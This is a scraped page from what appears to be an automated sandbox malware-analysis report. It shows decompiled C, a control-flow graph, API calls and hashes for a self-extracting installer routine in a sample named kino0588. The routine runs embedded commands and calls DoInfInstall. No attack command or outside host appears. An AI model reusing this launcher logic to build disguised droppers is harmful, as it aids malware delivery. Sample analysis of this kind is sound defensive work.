                                                                                                                                                                                                                                    Function 00193BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308libraryloaderCOMMONCrypto
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 36 193ba2-193bd9 37 193bdb-193bee call 19468f 36->37 38 193bfd-193bff 36->38 44 193d13-193d30 call 1944b9 37->44 45 193bf4-193bf7 37->45 40 193c03-193c28 memset 38->40 42 193c2e-193c40 call 19468f 40->42 43 193d35-193d48 call 191781 40->43 42->44 51 193c46-193c49 42->51 49 193d4d-193d52 43->49 57 193f4d 44->57 45->38 45->44 53 193d9e-193db6 call 191ae8 49->53 54 193d54-193d6c call 19468f 49->54 51->44 55 193c4f-193c56 51->55 53->57 68 193dbc-193dc2 53->68 54->44 64 193d6e-193d75 54->64 59 193c58-193c5e 55->59 60 193c60-193c65 55->60 62 193f4f-193f63 call 196ce0 57->62 65 193c6e-193c73 59->65 66 193c75-193c7c 60->66 67 193c67-193c6d 60->67 70 193d7b-193d98 CompareStringA 64->70 71 193fda-193fe1 64->71 72 193c87-193c89 65->72 66->72 75 193c7e-193c82 66->75 67->65 73 193dc4-193dce 68->73 74 193de6-193de8 68->74 70->53 70->71 81 193fe8-193fea 71->81 82 193fe3 call 192267 71->82 72->49 78 193c8f-193c98 72->78 73->74 77 193dd0-193dd7 73->77 79 193f0b-193f15 call 193fef 74->79 80 193dee-193df5 74->80 75->72 77->74 84 193dd9-193ddb 77->84 85 193c9a-193c9c 78->85 86 193cf1-193cf3 78->86 91 193f1a-193f1c 79->91 87 193fab-193fd2 call 1944b9 LocalFree 80->87 88 193dfb-193dfd 80->88 81->62 82->81 84->80 92 193ddd-193de1 call 19202a 84->92 94 193c9e-193ca3 85->94 95 193ca5-193ca7 85->95 86->53 90 193cf9-193d11 call 19468f 86->90 87->57 88->79 96 193e03-193e0a 88->96 90->44 90->49 98 193f1e-193f2d LocalFree 91->98 99 193f46-193f47 LocalFree 91->99 92->74 102 193cb2-193cc5 call 19468f 94->102 95->57 103 193cad 95->103 96->79 104 193e10-193e19 call 196495 96->104 107 193f33-193f3b 98->107 108 193fd7-193fd9 98->108 99->57 102->44 112 193cc7-193ce8 CompareStringA 102->112 103->102 113 193e1f-193e36 GetProcAddress 104->113 114 193f92-193fa9 call 1944b9 104->114 107->40 108->71 112->86 115 193cea-193ced 112->115 116 193e3c-193e80 113->116 117 193f64-193f76 call 1944b9 FreeLibrary 113->117 126 193f7c-193f90 LocalFree call 196285 114->126 115->86 120 193e8b-193e94 116->120 121 193e82-193e87 116->121 117->126 124 193e9f-193ea2 120->124 125 193e96-193e9b 120->125 121->120 128 193ead-193eb6 124->128 129 193ea4-193ea9 124->129 125->124 126->57 131 193eb8-193ebd 128->131 132 193ec1-193ec3 128->132 129->128 131->132 133 193ece-193eec 132->133 134 193ec5-193eca 132->134 137 193eee-193ef3 133->137 138 193ef5-193efd 133->138 134->133 137->138 139 193eff-193f09 FreeLibrary 138->139 140 193f40 FreeLibrary 138->140 139->98 140->99
                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                    			E00193BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x198004; // 0x21bd9a3c
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x199124 =  *0x199124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x198a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x198c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E0019468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E001944B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x199124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00191AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00196CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00193FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x198580;
													if( *0x198580 != 0) {
														E00192267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x198180;
											if( *0x198180 == 0) {
												_t146 = 0x4c7;
												E001944B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x199124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x199a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00196495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E001944B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x199124 = E00196285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E001944B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x198a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x199a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x198a38 & 0x0000ffff;
											_v380 = 0x199154;
											_v376 = _t151;
											_v372 = 0x1991e4;
											_v360 = _t97;
											if( *0x198a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x199a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x198d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x199a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x19a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x199124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x199a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x198a20;
										if( *0x198a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E0019202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E0019468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x198c42;
									if( *0x198c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x198a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E0019468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E0019468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00191781( &_v276, 0x104, _t130, 0x198c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E0019468F(_t130, 0x199a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}





























































                                                                                                                                                                                                                                    0x00193baa
                                                                                                                                                                                                                                    0x00193bb0
                                                                                                                                                                                                                                    0x00193bb7
                                                                                                                                                                                                                                    0x00193bc0
                                                                                                                                                                                                                                    0x00193bc2
                                                                                                                                                                                                                                    0x00193bc9
                                                                                                                                                                                                                                    0x00193bcb
                                                                                                                                                                                                                                    0x00193bcf
                                                                                                                                                                                                                                    0x00193bd3
                                                                                                                                                                                                                                    0x00193bd9
                                                                                                                                                                                                                                    0x00193bfd
                                                                                                                                                                                                                                    0x00193bfd
                                                                                                                                                                                                                                    0x00193bff
                                                                                                                                                                                                                                    0x00193c03
                                                                                                                                                                                                                                    0x00193c03
                                                                                                                                                                                                                                    0x00193c11
                                                                                                                                                                                                                                    0x00193c16
                                                                                                                                                                                                                                    0x00193c19
                                                                                                                                                                                                                                    0x00193c28
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193c30
                                                                                                                                                                                                                                    0x00193c39
                                                                                                                                                                                                                                    0x00193c40
                                                                                                                                                                                                                                    0x00193d13
                                                                                                                                                                                                                                    0x00193d15
                                                                                                                                                                                                                                    0x00193d21
                                                                                                                                                                                                                                    0x00193d26
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193c4f
                                                                                                                                                                                                                                    0x00193c56
                                                                                                                                                                                                                                    0x00193c60
                                                                                                                                                                                                                                    0x00193c65
                                                                                                                                                                                                                                    0x00193c77
                                                                                                                                                                                                                                    0x00193c78
                                                                                                                                                                                                                                    0x00193c7c
                                                                                                                                                                                                                                    0x00193c7e
                                                                                                                                                                                                                                    0x00193c82
                                                                                                                                                                                                                                    0x00193c82
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193c7c
                                                                                                                                                                                                                                    0x00193c67
                                                                                                                                                                                                                                    0x00193c69
                                                                                                                                                                                                                                    0x00193c6d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193c58
                                                                                                                                                                                                                                    0x00193c58
                                                                                                                                                                                                                                    0x00193c6e
                                                                                                                                                                                                                                    0x00193c6e
                                                                                                                                                                                                                                    0x00193c87
                                                                                                                                                                                                                                    0x00193c89
                                                                                                                                                                                                                                    0x00193d4d
                                                                                                                                                                                                                                    0x00193d4f
                                                                                                                                                                                                                                    0x00193d50
                                                                                                                                                                                                                                    0x00193d52
                                                                                                                                                                                                                                    0x00193d9e
                                                                                                                                                                                                                                    0x00193da8
                                                                                                                                                                                                                                    0x00193daf
                                                                                                                                                                                                                                    0x00193db4
                                                                                                                                                                                                                                    0x00193db6
                                                                                                                                                                                                                                    0x00193f4d
                                                                                                                                                                                                                                    0x00193f4d
                                                                                                                                                                                                                                    0x00193f4f
                                                                                                                                                                                                                                    0x00193f56
                                                                                                                                                                                                                                    0x00193f57
                                                                                                                                                                                                                                    0x00193f58
                                                                                                                                                                                                                                    0x00193f63
                                                                                                                                                                                                                                    0x00193f63
                                                                                                                                                                                                                                    0x00193dbc
                                                                                                                                                                                                                                    0x00193dc0
                                                                                                                                                                                                                                    0x00193dc2
                                                                                                                                                                                                                                    0x00193de6
                                                                                                                                                                                                                                    0x00193de6
                                                                                                                                                                                                                                    0x00193de8
                                                                                                                                                                                                                                    0x00193f0b
                                                                                                                                                                                                                                    0x00193f0b
                                                                                                                                                                                                                                    0x00193f0f
                                                                                                                                                                                                                                    0x00193f13
                                                                                                                                                                                                                                    0x00193f15
                                                                                                                                                                                                                                    0x00193f1a
                                                                                                                                                                                                                                    0x00193f1c
                                                                                                                                                                                                                                    0x00193f46
                                                                                                                                                                                                                                    0x00193f47
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193f47
                                                                                                                                                                                                                                    0x00193f1e
                                                                                                                                                                                                                                    0x00193f1f
                                                                                                                                                                                                                                    0x00193f25
                                                                                                                                                                                                                                    0x00193f26
                                                                                                                                                                                                                                    0x00193f2a
                                                                                                                                                                                                                                    0x00193f2d
                                                                                                                                                                                                                                    0x00193fd9
                                                                                                                                                                                                                                    0x00193fd9
                                                                                                                                                                                                                                    0x00193fda
                                                                                                                                                                                                                                    0x00193fda
                                                                                                                                                                                                                                    0x00193fe1
                                                                                                                                                                                                                                    0x00193fe3
                                                                                                                                                                                                                                    0x00193fe3
                                                                                                                                                                                                                                    0x00193fe8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193fe8
                                                                                                                                                                                                                                    0x00193f33
                                                                                                                                                                                                                                    0x00193f37
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193f37
                                                                                                                                                                                                                                    0x00193dee
                                                                                                                                                                                                                                    0x00193dee
                                                                                                                                                                                                                                    0x00193df5
                                                                                                                                                                                                                                    0x00193fad
                                                                                                                                                                                                                                    0x00193fb9
                                                                                                                                                                                                                                    0x00193fc2
                                                                                                                                                                                                                                    0x00193fc8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193fc8
                                                                                                                                                                                                                                    0x00193dfb
                                                                                                                                                                                                                                    0x00193dfd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193e03
                                                                                                                                                                                                                                    0x00193e0a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193e15
                                                                                                                                                                                                                                    0x00193e17
                                                                                                                                                                                                                                    0x00193e19
                                                                                                                                                                                                                                    0x00193f94
                                                                                                                                                                                                                                    0x00193fa4
                                                                                                                                                                                                                                    0x00193f7c
                                                                                                                                                                                                                                    0x00193f80
                                                                                                                                                                                                                                    0x00193f8b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193f8b
                                                                                                                                                                                                                                    0x00193e2c
                                                                                                                                                                                                                                    0x00193e30
                                                                                                                                                                                                                                    0x00193e34
                                                                                                                                                                                                                                    0x00193e36
                                                                                                                                                                                                                                    0x00193f69
                                                                                                                                                                                                                                    0x00193f6e
                                                                                                                                                                                                                                    0x00193f70
                                                                                                                                                                                                                                    0x00193f76
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193f76
                                                                                                                                                                                                                                    0x00193e3c
                                                                                                                                                                                                                                    0x00193e43
                                                                                                                                                                                                                                    0x00193e47
                                                                                                                                                                                                                                    0x00193e52
                                                                                                                                                                                                                                    0x00193e56
                                                                                                                                                                                                                                    0x00193e5c
                                                                                                                                                                                                                                    0x00193e61
                                                                                                                                                                                                                                    0x00193e68
                                                                                                                                                                                                                                    0x00193e70
                                                                                                                                                                                                                                    0x00193e74
                                                                                                                                                                                                                                    0x00193e7c
                                                                                                                                                                                                                                    0x00193e80
                                                                                                                                                                                                                                    0x00193e82
                                                                                                                                                                                                                                    0x00193e82
                                                                                                                                                                                                                                    0x00193e87
                                                                                                                                                                                                                                    0x00193e87
                                                                                                                                                                                                                                    0x00193e8b
                                                                                                                                                                                                                                    0x00193e91
                                                                                                                                                                                                                                    0x00193e94
                                                                                                                                                                                                                                    0x00193e96
                                                                                                                                                                                                                                    0x00193e96
                                                                                                                                                                                                                                    0x00193e9b
                                                                                                                                                                                                                                    0x00193e9b
                                                                                                                                                                                                                                    0x00193e9f
                                                                                                                                                                                                                                    0x00193ea2
                                                                                                                                                                                                                                    0x00193ea4
                                                                                                                                                                                                                                    0x00193ea4
                                                                                                                                                                                                                                    0x00193ea9
                                                                                                                                                                                                                                    0x00193ea9
                                                                                                                                                                                                                                    0x00193ead
                                                                                                                                                                                                                                    0x00193eb3
                                                                                                                                                                                                                                    0x00193eb6
                                                                                                                                                                                                                                    0x00193eb8
                                                                                                                                                                                                                                    0x00193eb8
                                                                                                                                                                                                                                    0x00193ebd
                                                                                                                                                                                                                                    0x00193ebd
                                                                                                                                                                                                                                    0x00193ec1
                                                                                                                                                                                                                                    0x00193ec3
                                                                                                                                                                                                                                    0x00193ec5
                                                                                                                                                                                                                                    0x00193ec5
                                                                                                                                                                                                                                    0x00193eca
                                                                                                                                                                                                                                    0x00193eca
                                                                                                                                                                                                                                    0x00193ece
                                                                                                                                                                                                                                    0x00193ed5
                                                                                                                                                                                                                                    0x00193ed9
                                                                                                                                                                                                                                    0x00193ee0
                                                                                                                                                                                                                                    0x00193ee6
                                                                                                                                                                                                                                    0x00193eea
                                                                                                                                                                                                                                    0x00193eec
                                                                                                                                                                                                                                    0x00193eee
                                                                                                                                                                                                                                    0x00193ef3
                                                                                                                                                                                                                                    0x00193ef3
                                                                                                                                                                                                                                    0x00193ef5
                                                                                                                                                                                                                                    0x00193efa
                                                                                                                                                                                                                                    0x00193efb
                                                                                                                                                                                                                                    0x00193efd
                                                                                                                                                                                                                                    0x00193f40
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193eff
                                                                                                                                                                                                                                    0x00193eff
                                                                                                                                                                                                                                    0x00193f05
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193f05
                                                                                                                                                                                                                                    0x00193efd
                                                                                                                                                                                                                                    0x00193dc7
                                                                                                                                                                                                                                    0x00193dce
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193dd0
                                                                                                                                                                                                                                    0x00193dd7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193dd9
                                                                                                                                                                                                                                    0x00193ddb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193ddd
                                                                                                                                                                                                                                    0x00193de1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193de1
                                                                                                                                                                                                                                    0x00193d59
                                                                                                                                                                                                                                    0x00193d65
                                                                                                                                                                                                                                    0x00193d6a
                                                                                                                                                                                                                                    0x00193d6c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193d6e
                                                                                                                                                                                                                                    0x00193d75
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193d8f
                                                                                                                                                                                                                                    0x00193d96
                                                                                                                                                                                                                                    0x00193d98
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193d98
                                                                                                                                                                                                                                    0x00193c8f
                                                                                                                                                                                                                                    0x00193c98
                                                                                                                                                                                                                                    0x00193cf1
                                                                                                                                                                                                                                    0x00193cf3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193cfe
                                                                                                                                                                                                                                    0x00193d11
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193d11
                                                                                                                                                                                                                                    0x00193c9c
                                                                                                                                                                                                                                    0x00193ca5
                                                                                                                                                                                                                                    0x00193ca7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193cad
                                                                                                                                                                                                                                    0x00193cb2
                                                                                                                                                                                                                                    0x00193cb7
                                                                                                                                                                                                                                    0x00193cc5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193ce8
                                                                                                                                                                                                                                    0x00193cec
                                                                                                                                                                                                                                    0x00193ced
                                                                                                                                                                                                                                    0x00193ced
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193ce8
                                                                                                                                                                                                                                    0x00193c9e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193c9e
                                                                                                                                                                                                                                    0x00193c56
                                                                                                                                                                                                                                    0x00193d35
                                                                                                                                                                                                                                    0x00193d35
                                                                                                                                                                                                                                    0x00193d3c
                                                                                                                                                                                                                                    0x00193d48
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193d48
                                                                                                                                                                                                                                    0x00193c03
                                                                                                                                                                                                                                    0x00193be2
                                                                                                                                                                                                                                    0x00193be7
                                                                                                                                                                                                                                    0x00193bee
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00193C11
                                                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00193CDC
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946A0
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: SizeofResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946A9
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946C3
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: LoadResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946CC
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: LockResource.KERNEL32(00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946D3
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: memcpy_s.MSVCRT ref: 001946E5
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001946EF
                                                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00198C42), ref: 00193D8F
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00193E26
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00198C42), ref: 00193EFF
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00198C42), ref: 00193F1F
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00198C42), ref: 00193F40
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00198C42), ref: 00193F47
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00198C42), ref: 00193F76
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00198C42), ref: 00193F80
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00198C42), ref: 00193FC2
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                    • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$doza2
                                                                                                                                                                                                                                    • API String ID: 1032054927-885953201
                                                                                                                                                                                                                                    • Opcode ID: b4923ede8354e96c4f9e9ac89bcfe5b50f4e0615165c987f37daf53fad84d034
                                                                                                                                                                                                                                    • Instruction ID: a75d452dc1f342c34a14a0f407fbaa9af8468c0283ba286012258b020452cbe2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4923ede8354e96c4f9e9ac89bcfe5b50f4e0615165c987f37daf53fad84d034
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7B1F2709083019BDF24DF688849B6B77E4EF85710F10092EFAA5D7590DB70CA85CB96
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00191AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
